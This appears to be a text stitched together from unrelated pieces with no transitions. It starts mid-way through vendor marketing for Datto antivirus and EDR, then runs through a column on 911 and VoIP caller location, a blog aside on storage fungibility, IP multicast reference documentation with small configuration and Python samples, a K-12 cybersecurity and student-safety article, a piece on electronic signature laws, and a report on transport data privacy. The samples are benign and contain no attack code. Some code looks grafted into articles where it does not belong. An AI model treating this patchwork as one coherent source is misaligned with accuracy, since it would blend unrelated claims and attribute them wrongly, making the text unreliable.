Employing robust antivirus solutions to detect and mitigate threats. Antivirus software can identify and remove known malware, providing an additional layer of defense against zero-day attacks.
How can Datto help?
Datto offers advanced solutions like Datto AV and Datto EDR to help prevent zero-day attacks. These tools have proven to be highly effective, as highlighted by an independent study from Miercom.
The study revealed that “Both Datto EDR and Datto AV achieved a 98% detection rate for zero-day threats, which is more than double the industry average for products in this class of 45%.”
Datto AV and Datto EDR offer the following features to help protect against zero-day threats:
- Real-time threat detection: Identifies and mitigates threats as they occur. This feature allows for immediate response to potential attacks, minimizing damage and preventing the spread of malware.
- Advanced behavioral analysis: Detects unusual activity that may indicate an attack. By continuously monitoring system behavior, Datto solutions can identify deviations from normal operations and flag potential threats.
- Comprehensive endpoint protection: Protects all endpoints in the network from potential threats. Datto AV and Datto EDR provide robust security for devices, ensuring that vulnerabilities are addressed and threats are mitigated.
To learn more about securing your endpoints, check out this recorded session on Locking Down Your Endpoints From Advanced Attack today.
Prevent zero-day attacks with Datto AV and Datto EDR
Zero-day vulnerabilities pose a significant threat to organizations due to their unknown nature and the difficulty in defending against them. By understanding what zero-day vulnerabilities are, how they are exploited and the impact they can have, organizations can better prepare and protect themselves. Solutions like Datto AV and Datto EDR are designed to provide robust protection against these threats, ensuring that your organization remains secure.
Request a demo of Datto AV and Datto EDR today to see how these powerful tools can help you prevent zero-day attacks and protect your critical data.
In the January 2000 issue, I described all the wonderful innovations I foresaw in our future. This January, I describe a problem that some of this innovation is causing.
"Johnny, call 911 and tell them to send an ambulance!" It sounds pretty simple. Johnny picks up the telephone, dials 911, and the ambulance is expected any moment. Only, Johnny is four years old and his mother is busy performing CPR on his little brother, whom she just pulled from the bottom of the backyard pool.
Throughout the U.S. and Canada, 911 is the universal emergency number for assistance during an emergency. When you dial 911, you are routed to a Public Safety Answering Point (PSAP), and most of the time a display tells the emergency dispatcher where you are calling from, even if you cannot verbally relay that information. That capability is known as enhanced 911, or E911.
It all began in 1957, when the National Association of Fire Chiefs recommended using a single number nationwide for reporting fires. And in 1967, the President's Commission on Law Enforcement and Administration of Justice recommended using a single number nationwide for reporting all emergencies. After much support, the President's Commission on Civil Disorders tasked the Federal Communications Commission (FCC) with finding a solution.
In November 1967, the FCC met with the American Telephone and Telegraph Company (AT&T), and the next year, AT&T announced that it would establish 911 as the emergency code throughout the United States. Why did AT&T choose 911? Because it was short, easy to remember, and had never been authorized as an office code, area code, or service code anywhere in the North American dialing plan.
As the new millennium began, 93% of the population living in 96% of the geographic U.S. was covered by some type of 911 service. And 95% of that coverage was enhanced 911.
But will the ambulance arrive in time? Will it arrive at all? That depends.
Thanks to all the emergency/rescue/police dramas on television, we all know that the ambulance is sent to the address where the telephone lives. But what if your telephone doesn't always live at the same address? Take, for example, the proliferation of wireless telephones today.
Improving wireless 911
Enter the FCC with a plan to improve wireless 911 services. According to the FCC, wireless carriers are to provide emergency dispatchers with information on the location from which a wireless call is being made. This is not just a "couple-of-mouse-clicks-and-they're-compliant" type of thing. Hence, wireless E911 is being implemented in two phases.
Phase I requires wireless carriers to deliver to the emergency dispatcher the telephone number of a wireless handset originating a 911 call, as well as the location of the cell site or base station receiving the 911 call. This provides only a rough indication of the caller's location.
Phase II requires carriers to deliver more specific latitude and longitude location information, known as Automatic Location Identification (ALI), to the dispatcher. And then we, the users, will all have to have E911-capable handsets. Yes, that means you may need a new cell phone to take advantage of the E911 service. To determine if your handset is E911-compliant, check with your service provider.
But what about the new voice over Internet Protocol (VoIP) telephones? Like wireless telephones, the telephone number of the IP telephone stays with the instrument. But unlike wireless telephones, there are no Phase I and Phase II requirements. So today, if the user moves a VoIP telephone and does not call the network administrator to report the move, there is no way to tell where the telephone is actually located. For example, let's say Johnny's mom, who is working from home this week, brought her VoIP telephone home from her office and connected it to her home network. When Johnny calls 911, an ambulance is promptly dispatched to mom's downtown office.
VoIP pushing 911's limits
This scenario is becoming more likely as telecommunications providers focus on converting telephone calls to data, and sending them around the world cheaply and efficiently. E911 is designed to work with the public switched telephone network (PSTN), a model of standardization and discipline operated by relatively few carriers. The Internet, however, is neither standardized nor disciplined. To set up personal long distance, one has only to buy a computer, install and configure a sound card and a microphone, install some software, and start making calls.
There is no question that VoIP benefits customers. But it also raises new and bewildering questions for public safety dispatchers, who are answering 911 calls that either carry no name, no address, or lack other location data that could help locate the caller. Worse yet, sometimes the dispatcher can receive information that sends the emergency vehicle off in the wrong direction.
Several manufacturers offer traditional-style telephones that connect to an IP network instead of a telephone wall outlet, can be conventionally dialed, and route voice calls as if they were being handled by the PSTN. Other manufacturers offer business-sized VoIP solutions that link extension to a central private branch exchange (PBX), and route calls to the PSTN or branch offices.
Several alternative long-distance carriers have announced that they will build IP networks to carry their customers' telephone traffic, or partner with companies that have IP network capacity. Even local exchange carriers are beginning to look at how they can better provide a broad range of voice, video, and data services to the residence. And the IP network may be the answer.
The problem: currently, there is no way of logging or identifying these IP nodes so they will display information when a user dials 911, and there are no VoIP directory services. Instead, each user group with VoIP capability must create and maintain its own list of IP addresses, and link them to names and locations. This, of course, assumes that users like Johnny's mom actually update the whereabouts of the telephone set, which is not likely. Why? Because there is no penalty, no calling in for activation. Unlike wireline services, the intelligence is in the telephone instrument, not on the cable. Sort of like a wireless instrument with a line cord to plug into a data network and no FCC requirements for ALI.
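The per-site bookkeeping described above, linking IP-phone addresses to names and physical locations, can be as simple as a manually maintained lookup table that a dispatcher-facing system consults. The addresses, names, and locations below are invented for illustration; the point is that a stale entry sends responders to the wrong place, exactly as in the earlier example.

```python
# Hypothetical hand-maintained registry for a site's VoIP phones.
# There is no network-wide directory service, so accuracy depends
# entirely on users reporting moves.
PHONE_LOCATIONS = {
    "10.0.4.17": {"user": "J. Smith", "location": "HQ, 3rd floor, room 312"},
    "10.0.9.42": {"user": "A. Jones", "location": "Branch office, suite 200"},
}

def locate_caller(ip: str) -> str:
    """Return the registered location for a 911 call from this IP phone."""
    entry = PHONE_LOCATIONS.get(ip)
    if entry is None:
        return "UNKNOWN LOCATION - dispatcher must ask the caller"
    return f"{entry['user']} at {entry['location']}"

print(locate_caller("10.0.4.17"))   # registered phone: location displayed
print(locate_caller("192.168.1.5"))  # unregistered or moved phone
```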
But I believe that relief is on the way. On May 1, 2000, President Clinton signed an executive order ending the government's intentional degradation of the global positioning system's (GPS) accuracy. President Clinton's order switched off the so-called "selective availability" (SA) feature of the GPS. SA continuously varied the accuracy of the civilian signal, effectively reducing its accuracy to 100 meters-not much help when you are trying to locate a heart attack victim in a high-rise area of a big city.
Because the civilian signal now has an accuracy of 20 meters or better, rest assured that many wireless carriers will select GPS to meet the FCC's E911 Phase II location requirements for wireless telephones. That means greater demand for the enabling chips, which means a lower cost per chip is likely. All this makes GPS-generated latitude and longitude for VoIP telephones a cost-effective solution to Johnny and his mom's problems. And yes, just like with wireless, that means you will need even newer VoIP telephones to take advantage of the E911 service.
By merging voice and data on one network, you could be managing only one network, not two. You could eliminate the PBX altogether and reduce the amount of cabling required in the work areas. VoIP will reduce the need for technicians to perform moves and adds, as people change offices within the network. Through the use of virtual private networks, VoIP can also support telecommuters and mobile workers.
Now, if we could just get a fire truck when we need one.
Donna Ballast is a communications analyst at The University of Texas at Austin and a BICSI registered communications distribution designer (RCDD). Questions can be sent to her at Cabling Installation & Maintenance or at PO Drawer 7580, The University of Texas, Austin, TX 78713; tel: (512) 471-0112, fax: (512) 471-8883, e-mail: [email protected].
Ed Grigson asks if storage is "fungible", but most of his post focuses on what fungibility means in relation to IT:
In plain English fungibility means something is interchangeable — a common example is money. If someone owes you ten dollars you don’t care if they pay you one ten dollar bill, two fives, or ten ones — you get essentially the same thing. Another example is that you’re supposed to eat five portions of fruit and veg every day but you could eat five fruits, five veg, or a mixture — they’re fungible (interchangeable).
Now that we know what it is, who cares whether something is fungible?
- for consumers fungibility is a good thing as it increases competition and flexibility — you can buy your commodity from anyone, often driving down prices
- for providers fungibility could be good and bad. The increased competition might benefit your competitors but history has shown that once a market becomes a commodity it tends to grow, leading to more business for all involved.
So is storage fungible? It's easy to see holes in the concept when it comes to the "inertia" of storage – after all, you can't easily move data! Head over to Ed's post and reply with your take: is storage a fungible commodity?
Information About IP Multicast Technology
Role of IP Multicast in Information Delivery
IP multicast is a bandwidth-conserving technology that reduces traffic by delivering a single stream of information simultaneously to potentially thousands of businesses and homes. Applications that take advantage of multicast include video conferencing, corporate communications, distance learning, and distribution of software, stock quotes, and news.
IP multicast routing enables a host (source) to send packets to a group of hosts (receivers) anywhere within the IP network by using a special form of IP address called the IP multicast group address. The sending host inserts the multicast group address into the IP destination address field of the packet, and IP multicast routers and multilayer switches forward incoming IP multicast packets out of all interfaces that lead to members of the multicast group. Any host, regardless of whether it is a member of a group, can send to a group. However, only the members of a group receive the message.
IP Multicast Routing Protocols
The software supports the following protocols to implement IP multicast routing:
IGMP is used between hosts on a LAN and the routers on that LAN to track the multicast groups of which hosts are members.
Protocol Independent Multicast (PIM) is used between routers so that they can track which multicast packets to forward to each other and to their directly connected LANs.
This figure shows where these protocols operate within the IP multicast environment.
Multicast Group Transmission Scheme
IP communication consists of hosts that act as senders and receivers of traffic as shown in the first figure. Senders are called sources. Traditional IP communication is accomplished by a single host source sending packets to another single host (unicast transmission) or to all hosts (broadcast transmission). IP multicast provides a third scheme, allowing a host to send packets to a subset of all hosts (multicast transmission). This subset of receiving hosts is called a multicast group. The hosts that belong to a multicast group are called group members.
Multicast is based on this group concept. A multicast group is an arbitrary number of receivers that join a group in order to receive a particular data stream. This multicast group has no physical or geographical boundaries--the hosts can be located anywhere on the Internet or on any private internetwork. Hosts that are interested in receiving data from a source to a particular group must join that group. Joining a group is accomplished by a host receiver by way of the Internet Group Management Protocol (IGMP).
In a multicast environment, any host, regardless of whether it is a member of a group, can send to a group. However, only the members of a group can receive packets sent to that group. Multicast packets are delivered to a group using best-effort reliability, just like IP unicast packets.
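On an end host, the join described above is a single socket operation: when an application requests membership in a group, the operating system emits the IGMP membership report on its behalf. A minimal Python sketch (the group address 239.1.1.1 and port 5000 are arbitrary examples, not values from this document):

```python
import socket
import struct

GROUP = "239.1.1.1"  # arbitrary example group in the administratively scoped range
PORT = 5000          # arbitrary example port

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))

# struct ip_mreq: 4-byte group address followed by 4-byte local interface address.
mreq = struct.pack("4s4s", socket.inet_aton(GROUP), socket.inet_aton("0.0.0.0"))
try:
    # This call is what makes the OS send the IGMP membership report.
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    joined = True
except OSError:
    joined = False  # e.g. no multicast-capable interface in this environment
# After a successful join, sock.recvfrom(1500) would deliver datagrams
# that any source sends to 239.1.1.1:5000.
sock.close()
```

Sending to the group needs no membership at all: a plain UDP sendto() addressed to 239.1.1.1:5000 reaches every joined receiver, which mirrors the "any host can send" rule above.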
In the next figure, the receivers (the designated multicast group) are interested in receiving the video data stream from the source. The receivers indicate their interest by sending an IGMP host report to the routers in the network. The routers are then responsible for delivering the data from the source to the receivers. The routers use Protocol Independent Multicast (PIM) to dynamically create a multicast distribution tree. The video data stream will then be delivered only to the network segments that are in the path between the source and the receivers.
IP Multicast Boundary
As shown in the figure, address scoping defines domain boundaries so that domains with RPs that have the same IP address do not leak into each other. Scoping is performed on the subnet boundaries within large domains and on the boundaries between the domain and the Internet.
You can set up an administratively scoped boundary on an interface for multicast group addresses using the ip multicast boundary command with the access-list argument. A standard access list defines the range of addresses affected. When a boundary is set up, no multicast data packets are allowed to flow across the boundary from either direction. The boundary allows the same multicast group address to be reused in different administrative domains.
The Internet Assigned Numbers Authority (IANA) has designated the multicast address range 239.0.0.0 to 239.255.255.255 as the administratively scoped addresses. This range of addresses can be reused in domains administered by different organizations. They would be considered local, not globally unique.
You can configure the filter-autorp keyword to examine and filter Auto-RP discovery and announcement messages at the administratively scoped boundary. Any Auto-RP group range announcements from the Auto-RP packets that are denied by the boundary access control list (ACL) are removed. An Auto-RP group range announcement is permitted and passed by the boundary only if all addresses in the Auto-RP group range are permitted by the boundary ACL. If any address is not permitted, the entire group range is filtered and removed from the Auto-RP message before the Auto-RP message is forwarded.
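As a sketch, a boundary that keeps administratively scoped (239.0.0.0/8) traffic inside the domain and filters Auto-RP messages accordingly might look like the following. The ACL number and interface name are placeholders, not values from this document:

```
! Deny administratively scoped groups at the domain edge; permit all other groups.
access-list 10 deny 239.0.0.0 0.255.255.255
access-list 10 permit 224.0.0.0 15.255.255.255
!
interface GigabitEthernet0/1
 ip multicast boundary 10 filter-autorp
```

With this configuration, 239.0.0.0/8 data packets stop at the interface in both directions, and Auto-RP announcements covering any denied group range are filtered as described above.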
IP Multicast Group Addressing
A multicast group is identified by its multicast group address. Multicast packets are delivered to that multicast group address. Unlike unicast addresses that uniquely identify a single host, multicast IP addresses do not identify a particular host. To receive the data sent to a multicast address, a host must join the group that address identifies. The data is sent to the multicast address and received by all the hosts that have joined the group indicating that they wish to receive traffic sent to that group. The multicast group address is assigned to a group at the source. Network administrators who assign multicast group addresses must make sure the addresses conform to the multicast address range assignments reserved by the Internet Assigned Numbers Authority (IANA).
IP Class D Addresses
IP multicast addresses have been assigned to the IPv4 Class D address space by IANA. The high-order four bits of a Class D address are 1110. Therefore, host group addresses can be in the range 224.0.0.0 to 239.255.255.255. A multicast address is chosen at the source (sender) for the receivers in a multicast group.
The Class D address range is used only for the group address or destination address of IP multicast traffic. The source address for multicast datagrams is always the unicast source address.
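The "high-order four bits are 1110" rule translates directly into code. This quick check (a sketch using only the standard library) mirrors what Python's own `ipaddress` module reports for the multicast range:

```python
import ipaddress

def is_class_d(addr: str) -> bool:
    """True when the high-order four bits of an IPv4 address are 1110."""
    first_octet = int(addr.split(".")[0])
    return (first_octet >> 4) == 0b1110  # equivalent to 224 <= first_octet <= 239

# Cross-check against the standard library's view of the multicast range.
for a in ("223.255.255.255", "224.0.0.0", "239.255.255.255", "240.0.0.0"):
    assert is_class_d(a) == ipaddress.ip_address(a).is_multicast
```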
IP Multicast Address Scoping
The multicast address range is subdivided to provide predictable behavior for various address ranges and for address reuse within smaller domains. The table provides a summary of the multicast address ranges. A brief summary description of each range follows.
| Range | Addresses | Description |
| --- | --- | --- |
| Reserved Link-Local Addresses | 224.0.0.0 to 224.0.0.255 | Reserved for use by network protocols on a local network segment. |
| Globally Scoped Addresses | 224.0.1.0 to 238.255.255.255 | Reserved to send multicast data between organizations and across the Internet. |
| Source Specific Multicast | 232.0.0.0 to 232.255.255.255 | Reserved for use with the SSM datagram delivery model where data is forwarded only to receivers that have explicitly joined the group. |
| GLOP Addresses | 233.0.0.0 to 233.255.255.255 | Reserved for statically defined addresses by organizations that already have an assigned autonomous system (AS) domain number. |
| Limited Scope Address | 239.0.0.0 to 239.255.255.255 | Reserved as administratively or limited scope addresses for use in private multicast domains. |
Reserved Link-Local Addresses
The IANA has reserved the range 224.0.0.0 to 224.0.0.255 for use by network protocols on a local network segment. Packets with an address in this range are local in scope and are not forwarded by IP routers. Packets with link local destination addresses are typically sent with a time-to-live (TTL) value of 1 and are not forwarded by a router.
Within this range, reserved link-local addresses provide network protocol functions for which they are reserved. Network protocols use these addresses for automatic router discovery and to communicate important routing information. For example, Open Shortest Path First (OSPF) uses the IP addresses 224.0.0.5 and 224.0.0.6 to exchange link-state information.
IANA assigns single multicast address requests for network protocols or network applications out of the 224.0.1.xxx address range. Multicast routers forward these multicast addresses.
All the packets with reserved link-local addresses are punted to the CPU by default in the ASR 903 RSP2 Module.
Globally Scoped Addresses
Addresses in the range 224.0.1.0 to 238.255.255.255 are called globally scoped addresses. These addresses are used to send multicast data between organizations across the Internet. Some of these addresses have been reserved by IANA for use by multicast applications. For example, the IP address 224.0.1.1 is reserved for Network Time Protocol (NTP).
Source Specific Multicast Addresses
Addresses in the range 232.0.0.0/8 are reserved for Source Specific Multicast (SSM) by IANA. In Cisco IOS software, you can use the ip pim ssm command to configure SSM for arbitrary IP multicast addresses also. SSM is an extension of Protocol Independent Multicast (PIM) that allows for an efficient data delivery mechanism in one-to-many communications. SSM is described in the IP Multicast Delivery Modes section.
GLOP addressing (as proposed by RFC 2770, GLOP Addressing in 233/8) proposes that the 233.0.0.0/8 range be reserved for statically defined addresses by organizations that already have an AS number reserved. This practice is called GLOP addressing. The AS number of the domain is embedded into the second and third octets of the 233.0.0.0/8 address range. For example, AS 62010 is written in hexadecimal format as F23A. Separating the two octets F2 and 3A results in 242 and 58 in decimal format. These values result in a subnet of 233.242.58.0/24 that would be globally reserved for AS 62010 to use.
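That octet-embedding rule is easy to reproduce in code. A small sketch:

```python
def glop_subnet(as_number: int) -> str:
    """Return the GLOP /24 derived from a 16-bit AS number, as described above."""
    if not 0 <= as_number <= 0xFFFF:
        raise ValueError("GLOP addressing covers only 16-bit AS numbers")
    high, low = divmod(as_number, 256)  # the second and third octets of 233/8
    return f"233.{high}.{low}.0/24"

print(glop_subnet(62010))  # -> 233.242.58.0/24, matching the worked example
```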
Limited Scope Addresses
The range 239.0.0.0 to 239.255.255.255 is reserved as administratively or limited scoped addresses for use in private multicast domains. These addresses are constrained to a local group or organization. Companies, universities, and other organizations can use limited scope addresses to have local multicast applications that will not be forwarded outside their domain. Routers typically are configured with filters to prevent multicast traffic in this address range from flowing outside an autonomous system (AS) or any user-defined domain. Within an AS or domain, the limited scope address range can be further subdivided so that local multicast boundaries can be defined.
Network administrators may use multicast addresses in this range, inside a domain, without conflicting with others elsewhere in the Internet.
Layer 2 Multicast Addresses
Historically, network interface cards (NICs) on a LAN segment could receive only packets destined for their burned-in MAC address or the broadcast MAC address. In IP multicast, several hosts need to be able to receive a single data stream with a common destination MAC address. Some means had to be devised so that multiple hosts could receive the same packet and still be able to differentiate between several multicast groups. One method to accomplish this is to map IP multicast Class D addresses directly to a MAC address. Using this method, NICs can receive packets destined for many different MAC addresses.
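The usual mapping (defined in RFC 1112) copies the low-order 23 bits of the group address into the Ethernet prefix 01:00:5e, which means 32 different group addresses share each MAC address. A sketch:

```python
import socket
import struct

def multicast_mac(group: str) -> str:
    """Map an IPv4 multicast group to its Ethernet MAC address."""
    ip = struct.unpack("!I", socket.inet_aton(group))[0]
    if (ip >> 28) != 0b1110:
        raise ValueError("not a Class D address")
    low23 = ip & 0x7FFFFF  # only 23 of the 28 group-address bits survive the mapping
    return "01:00:5e:%02x:%02x:%02x" % (low23 >> 16, (low23 >> 8) & 0xFF, low23 & 0xFF)

# 32 different groups share one MAC: 224.1.1.1 and 225.1.1.1 collide.
print(multicast_mac("224.1.1.1"))  # -> 01:00:5e:01:01:01
print(multicast_mac("225.1.1.1"))  # -> 01:00:5e:01:01:01
```

The collision shown in the last two lines is exactly why a receiving host must still filter at the IP layer after the NIC accepts a frame.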
Cisco Group Management Protocol (CGMP) is used on routers connected to Catalyst switches to perform tasks similar to those performed by IGMP. CGMP is necessary for those Catalyst switches that cannot distinguish between IP multicast data packets and IGMP report messages, both of which are addressed to the same group address at the MAC level.
IP Multicast Delivery Modes
IP multicast delivery modes differ only for the receiver hosts, not for the source hosts. A source host sends IP multicast packets with its own IP address as the IP source address of the packet and a group address as the IP destination address of the packet.
Source Specific Multicast
Source Specific Multicast (SSM) is a datagram delivery model that best supports one-to-many applications, also known as broadcast applications. SSM is a core network technology for the Cisco implementation of IP multicast targeted for audio and video broadcast application environments.
For the SSM delivery mode, an IP multicast receiver host must use IGMP Version 3 (IGMPv3) to subscribe to channel (S,G). By subscribing to this channel, the receiver host is indicating that it wants to receive IP multicast traffic sent by source host S to group G. The network will deliver IP multicast packets from source host S to group G to all hosts in the network that have subscribed to the channel (S, G).
SSM does not require group address allocation within the network, only within each source host. Different applications running on the same source host must use different SSM groups. Different applications running on different source hosts can arbitrarily reuse SSM group addresses without causing any excess traffic on the network.
According to The State of K-12 Cybersecurity 2020 Year in Review report published by the K12 Security Information Exchange and the K-12 Cybersecurity Resource Center:
". . . the 2020 calendar year saw a record-breaking number of publicly-disclosed school cyber incidents. Moreover, many of these incidents were significant: resulting in school closures, millions of dollars of stolen taxpayer dollars, and student data breaches directly linked to identity theft and credit fraud."
The threat to districts from cyber attacks is clear, and it is increasing. But the line between cybersecurity and student safety is still blurred for many district IT teams. K-12 cyber safety and K-12 cybersecurity strategies continue to focus on network and web search monitoring. However, more school data is created and stored in cloud applications like Google Workspace for Education and Microsoft 365. Therefore, it’s critical that districts monitor and secure their cloud apps.
Schools provide cloud applications to students for learning, collaboration, and communication purposes, but students don’t always use those apps for schoolwork. Schools are experiencing greater rates of cybersecurity and safety incidents within their own cloud applications.
Toxic online behavior and student cyber safety have been an issue for schools and their communities for quite some time now. As students become more comfortable with using school technology, they are also becoming more comfortable using it to communicate with each other and to express their own thoughts. For example, students are increasingly using Google Docs to journal their thoughts and feelings.
IT managers are becoming unique allies, giving administrators the ability to detect cyber safety signals such as self-harm, suicide, cyberbullying, threats of violence, and more.
There are at least six types of student cyber safety risks:
Cyberbullying is one of the most harmful to students, whether they are the ones doing the bullying or being bullied. Cyberbullying detection is critical because the bullies have problems that need to be resolved. They may use bullying to fit into the crowd or to get attention, but the underlying problems they face include a lack of empathy or an inability to deal with negative emotions.
Research shows that the students being bullied report that it affects their ability to learn and feel safe in school. Targets of bullying also experience mental health issues that can be severe, including social anxiety, depression, suicidal thoughts, self-harm, eating disorders, and drug and alcohol abuse. These types of issues can be long-term and difficult to remedy.
Student suicide is another critical risk because when a student takes their own life, the opportunity to help them is over. Student suicide prevention is another area where IT teams can be the first line of defense to spot suicide signals. IT teams understand self-harm monitoring technology, they have visibility into students' behavior online, and they can provide a fast and objective response.
The IT team shouldn’t have an active role in working with students but should turn over information about the signals they see to the district professionals who are tasked with providing counseling. However, it would be a mistake to underestimate the role IT can play in an overall district suicide prevention program.
Phishing, malware, account takeovers, and data breaches have been hitting K-12 schools hard over the past couple of years. And, just in the last year or so, we’re seeing a real increase in awareness of the problem.
Now that many districts are bringing education back into the classroom, district IT security leaders and admins need to thoughtfully plan for how they will bring devices that have been connected to other unmanaged networks for months back into the network. You’ll also need to consider how you will secure sensitive district data going forward if students, teachers, and staff will be able to take school devices home even after school buildings fully reopen.
To borrow an expression from Benjamin Franklin, when it comes to cybersecurity, an ounce of prevention is worth a pound of cure. Districts need to focus on cybersecurity to prevent attacks from occurring. By the time an attack has happened, your district is in a compromised position. Cyber insurance can help you recover, but cyber insurance isn’t a substitute for cybersecurity.
Make sure cloud security fits in your cybersecurity infrastructure. You can use a multi-layered cybersecurity infrastructure to protect data inside and outside of your network. Undoubtedly, you already have one or more tools in your infrastructure because no one solution does everything or does everything well. Your cybersecurity infrastructure needs to cover a variety of things such as identity and access management, endpoint security and network security.
But if you use Google or Microsoft cloud applications, you need to add a cloud security layer to protect your data and your students. Knowing where to start is the challenge for many districts, which is where the framework developed by The National Institute of Standards and Technology (NIST) comes in. You can use the framework to develop your own K-12 NIST Cybersecurity Framework.
Once completed, you'll have established the five functions that lay the foundation for implementation and are the five pillars you need to succeed. Districts around the country have used the Framework, and states like New Hampshire have passed legislation that requires districts to comply with a subset of the standard.
Signing forms in triplicate may soon be a thing of the past thanks to legislation making electronic signatures legally binding.
Almost every developed country in the world has passed, or is getting ready to pass, laws surrounding electronic signatures.
Blake Sutherland, product manager for Ottawa-based Entrust.net, expects digital signatures to be a very popular form of electronic signature.
A digital signature is an electronic signature that can be used in all imaginable types of electronic information transfer. Digital signatures are based on mathematical theory and implemented with cryptographic algorithms. They require that the holder of the signature have a two-key system for signing and verification (one private, the other public). The certificates that vouch for digital signatures are issued by certification authorities. There has been a lot of excitement over the signature authentication legislation worldwide, Sutherland noted.
“This has made it so that things can be done that couldn’t be done before. In the past if you were negotiating a mortgage on-line there would be a point when you would have to print it, sign it, initial it, and then courier the mortgage. Now a digital signature is legally binding. It allows that process to be entirely Web-based,” Sutherland said.
Bob Pratt said he could see digital and electronic signatures being used for one-time transactions, and transactions involving a group of people.
“In the past if you wanted to sign a contract on-line, you had to get a group of people to sign a statement that made their signatures binding – there was no point. Now, the signatures are automatically binding and it will make the process more useful and quick,” said Pratt, director of product marketing for Mountain View, Calif.-based VeriSign Inc.
“It’s not just deciding to do it, it’s deciding to do it and it’s legally sanctioned.”
Entrust’s Sutherland noted that digital signatures are one of the more secure forms as they provide some proof of what was verified.
“The signature is unique to what is being signed,” he said. “If someone tried to change a signed document, the signature would no longer be verifiable.”
Digital signatures are backed by a certificate. A certificate is a computer-based record that identifies the subscriber, contains the public key and is digitally signed by the certification authority. The digital signature certificate must be associated with both a private key and a public key. When you publish the certificate, you identify yourself to the certification authority by providing it with your public key.
When you use your digital signature software, you create a matched pair of keys. One is the “private” key, which is typically installed on your computer. The private key is used only by you and is required during the signing process.
The second key is the “public” key. The public key is available for use by anyone wishing to authenticate documents you sign. The public key will “read” the digital signature created by the private key and verify the authenticity of documents created with it. It would be similar to the process of accessing a safety deposit box. Your key must work with the bank’s key before opening the box.
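The division of labor between the two keys can be illustrated with a deliberately tiny, insecure RSA example. This is a toy sketch with textbook-sized primes, chosen only to make the sign-with-private, verify-with-public mathematics visible; real systems use 2048-bit keys and proper padding:

```python
import hashlib

# Toy RSA with tiny fixed primes -- for illustration only, NOT secure.
p, q = 61, 53
n = p * q            # 3233, the public modulus
phi = (p - 1) * (q - 1)
e = 17               # public exponent
d = pow(e, -1, phi)  # private exponent (modular inverse; Python 3.8+)

def sign(message: bytes) -> int:
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(digest, d, n)          # "signing" with the private key

def verify(message: bytes, signature: int) -> bool:
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == digest  # anyone can check with (e, n)

sig = sign(b"I agree to the contract")
assert verify(b"I agree to the contract", sig)
assert not verify(b"I agree to the contracT", sig)  # tampering breaks the check
```

Only the holder of d can produce a signature that the public pair (e, n) will verify, which is the safety-deposit-box property the article describes.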
Pratt predicted many people will use this legislation as part of their on-line financial transactions. He mentioned transferring funds from account to account or even bank to bank as one possibility.
Pratt noted that last year when he bought his house he had to go through a lot of paper, and that paper had to go through a lot of hands.
“I would say that next year I would be able to find all the players on-line and have the entire transaction done with the mortgage as the only paper,” he said.
Pratt added the passing of such legislation is not going to bring great change right now.
“It’s not an explosive event,” he said. “It’s more like the beginning of an avalanche.”
Acceptance still pending
Lawrence Weinberg, a partner with Toronto-based law firm Cassels, Brock and Blackwell, said it will take time for people to accept and use electronic signatures.
“I think time will get people over the hurdle. There was a time when people wouldn’t give their credit card number out over the phone and they do now – and that’s probably more dangerous than anything,” he said.
He added there will be fraud, because fraud is everywhere, but noted the on-line transactions will probably be fairly safe.
“I think the Internet will prove trustworthy,” Weinberg said. “Clearly it is the future. A lot of money is being spent to ensure privacy, secrecy and security, and another load of money is being spent on publicizing it so people get over their concerns.”
He said that in Ontario, there are plans underway to make the entire process of land registry paperless.
“The whole land registry system – whereby you get a paper deed to your house – if being replaced by an electronic system. This change has been underway for 10 years and will be underway for another 10. They have to enter all that data and make sure the entries are correct,” he said.
He added that acceptance in that kind of change will come because sooner or later it will be the only way to do it.
He did note that there are some things that could now be bought over the Internet, that people will just not buy.
“There will always be things people want to go out and see and touch before they buy, like a car. But there will be other kinds of transactions where large amounts of money will move across a wire or air, and that will become very commonplace,” Weinberg said.
He has already used electronic signatures, and noted that so far, in the legal profession, it has not cut down on paper use.
“There are reams of e-mails,” he laughed. “Lawyers are known for wanting paper files where they can track a chronology of events by flipping pages.”
He suggested that worldwide standards will have to be developed and systems adopted as people will not only communicate instantaneously around the world but finalize transactions and contracts in a matter of hours versus days.
Pratt agreed, and noted there will be some culture clashes in the way business is handled, but that time will sort out all those differences.
"It's the same with credit card use. It is less common in Europe than in North America. So at first North America may use electronic signatures more, and then after a time they will be in use globally," Pratt said, although he noted some of VeriSign's biggest digital signature certificate clients are in Japan.
Governments are collecting lots of data on the people using roads, trains and buses, and without proper oversight, that information could easily be misused.
As Americans hand over more of their personal data to use public transportation systems, the government must do more to ensure their privacy is being protected, according to a recent report.
The rise of smart cities has connected more public infrastructure to the internet, creating numerous opportunities to collect data on the people using the country’s roads, subways and buses. While cities could use real-time tracking to reduce congestion and improve transportation systems, researchers at IDC worry those practices could also render anonymity a thing of the past.
In a report titled “Surveillance Avenue—Urban Mobility and Addressing the Erosion of Privacy,” researchers said it’s becoming difficult for people to use public transportation systems without surrendering at least some of their personal data. Facial recognition cameras, license plate readers, mobile phone data and other technologies are increasingly used to track people as they move through the world, and combined with other datasets, that information could paint an incredibly intimate picture of an individual's life.
Without proper protections, they noted, that information could easily fall into the wrong hands.
"As increasing amounts of data are collected, we are faced with the issue that one must exchange personal privacy for the use of publicly funded transportation networks or assets,” wrote Mark Zannoni, who leads IDC’s Worldwide Urban Mobility Program and spearheads the group’s smart cities and transportation research. “Whether initially personally identifiable or anonymous, individual data from urban mobility can be deanonymized, which is not only invasive but also enables potentially dangerous situations.”
Local governments often struggle to secure their digital infrastructure, so those troves of location data could be vulnerable to hacks or other unintentional exposures, researchers said. But even if the information is only accessible to governments, there are still myriad opportunities for potential abuse, they said, and people have almost no way to opt out.
In the report, researchers urged the federal government to enact broad regulations to protect individuals’ privacy and recommended lawmakers include measures to ensure “transportation-related” data is used responsibly. The legislation should specify how personal information could be used and shared, who has ownership over different types of data and what penalties groups would face for breaking the rules, among other measures.
Cities and local transportation agencies would then have the option to build on nationwide privacy protections through their own regulations.
Lawmakers have introduced a slew of bills aimed at strengthening privacy protections in recent months, but they have yet to take any meaningful steps toward enacting a national framework. That said, calls to rein in the government's use of facial recognition software have gained momentum on Capitol Hill, and lawmakers from both parties appear eager to regulate the tech.
